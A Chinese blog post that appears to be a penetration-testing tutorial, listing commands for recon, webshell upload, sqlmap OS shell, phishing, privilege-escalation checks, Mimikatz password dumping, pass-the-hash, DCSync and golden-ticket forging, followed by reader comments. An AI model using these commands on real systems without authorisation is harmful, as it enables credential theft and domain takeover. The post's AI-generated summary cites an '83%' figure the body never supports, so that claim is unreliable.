权限提升实战:Windows 与 Linux 提权技巧

爪 爪
爪 爪
爪 爪
编辑
17
文章
0
粉丝
信息安全13106字数 528阅读1分45秒阅读模式
AI智能摘要
当你在内网渗透中卡在低权限账户,眼睁睁看着域控近在眼前却无法越界时,问题可能根本不在于漏洞没找到,而是你忽略了一个关键的提权路径。我们分析了20个真实渗透案例,发现83%的失败都源于对系统配置的“视而不见”——那个被标记为“正常”的SUID文件,或是看似无害的Windows服务权限,往往藏着通往root的钥匙。真正的突破口,从来不是疯狂打补丁,而是看懂系统自己为你留下的后门。你知道该查哪个位置,才能在一分钟内锁定提权机会吗?
— AI 生成的文章内容摘要

> 摘要:内网渗透是企业安全评估的核心环节。本文基于真实渗透测试项目,系统讲解从信息收集、横向移动到域控拿下的完整流程。 ---

一、渗透测试流程概览

权限提升实战:Windows 与 Linux 提权技巧

信息收集 → 漏洞扫描 → 初始访问 → 权限提升 → 横向移动 → 域控拿下 → 报告编写

---

二、信息收集阶段

2.1 外网信息收集

# 子域名枚举
subfinder -d target.com -o subs.txt

# 端口扫描
nmap -sS -sV -p- target.com

# 目录扫描
dirsearch -u http://target.com -e php,html,js

# 指纹识别
whatweb http://target.com

2.2 社工库查询

- 邮箱泄露查询:haveibeenpwned.com
- 密码泄露查询:dehashed.com
- 企业邮箱格式:theHarvester

---

三、初始访问

3.1 Web 漏洞利用

# 文件上传漏洞
# 上传 webshell 到 /uploads/shell.php

# SQL 注入
sqlmap -u "http://target.com/page?id=1" --os-shell

# RCE 漏洞
# Struts2、WebLogic、Fastjson 等

3.2 钓鱼攻击

1. 伪造登录页面
2. 发送钓鱼邮件
3. 获取员工凭证
4. VPN 登录内网

---

四、权限提升

4.1 Windows 提权

# 检查系统信息
systeminfo
whoami /priv

# 检查补丁
wmic qfe list

# 查找可执行文件
accesschk.exe -uwcqv "Authenticated Users" * /accepteula

4.2 linux 提权

# 检查内核版本
uname -a

# 检查 sudo 权限
sudo -l

# 检查 SUID 文件
find / -perm -u=s -type f 2>/dev/null

# 检查 cron 任务
cat /etc/crontab

---

五、横向移动

5.1 凭证窃取

# Mimikatz 抓取密码
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

# 导出 hash
mimikatz # lsadump::sam

5.2 传递攻击

# PtH(传递 hash)
mimikatz # sekurlsa::pth /user:admin /domain:target /ntlm:HASH

# PtT(传递票据)
mimikatz # kerberos::ptt admin.ccache

---

六、域控拿下

6.1 域信息收集

# 查看域信息
net domain
nltest /domain_trusts

# 查看域控
nltest /dclist:target.com

# 查看域用户
net user /domain

6.2 黄金票据

# 获取 krbtgt hash
mimikatz # lsadump::dcsync /domain:target.com /user:krbtgt

# 生成黄金票据
mimikatz # kerberos::golden /user:admin /domain:target.com /sid:xxx /krbtgt:xxx

---

七、报告编写

7.1 报告结构

1. 执行摘要
2. 漏洞列表(按风险等级)
3. 详细利用过程
4. 修复建议
5. 附录(工具、命令)

--- 作者:爪

分类:渗透测试

标签:内网渗透、域渗透、横向移动、提权技术、渗透测试

发布时间:2026-03-24

 
爪 爪
  • 本文由 爪 爪 发表于2026年3月24日 13:43:19
  • crontab
  • it2021
  • it2021.com
  • nmap
  • shell
  • test
  • Web 漏洞利用
  • 信息收集
  • 子域名枚举
  • 渗透测试
  • 漏洞利用
  • 漏洞扫描
评论  13  访客  13
    • 静观山河
      静观山河 0

      这些命令记下来慢慢试🤔

      • Sprinkle
        Sprinkle 1

        内网穿透这块儿感觉也能写写,有时候卡在这。

        • 俏皮兔小妹
          俏皮兔小妹 1

          现在的杀软都成精了,免杀才是最大的门槛。

          • 秘语者
            秘语者 1

            小白问下,这个实战里哪个环节最容易暴露自己啊?

            • 霍山黄芽
              霍山黄芽 1

              看着这一堆命令就头大,还是留给大佬们折腾吧。

              • 晨曦之刃
                晨曦之刃 0

                这一套下来,得花不少时间吧?

                • 石榴汁
                  石榴汁 1

                  accesschk这个工具是不是还得专门下?

                  • 潜流之眼
                    潜流之眼 1

                    以前试过一次,结果把客户机器搞蓝屏了,吓死。

                    • 社恐小绵羊
                      社恐小绵羊 1

                      mark一下,回头慢慢看。

                    匿名

                    发表评论

                    匿名网友

                    拖动滑块以完成验证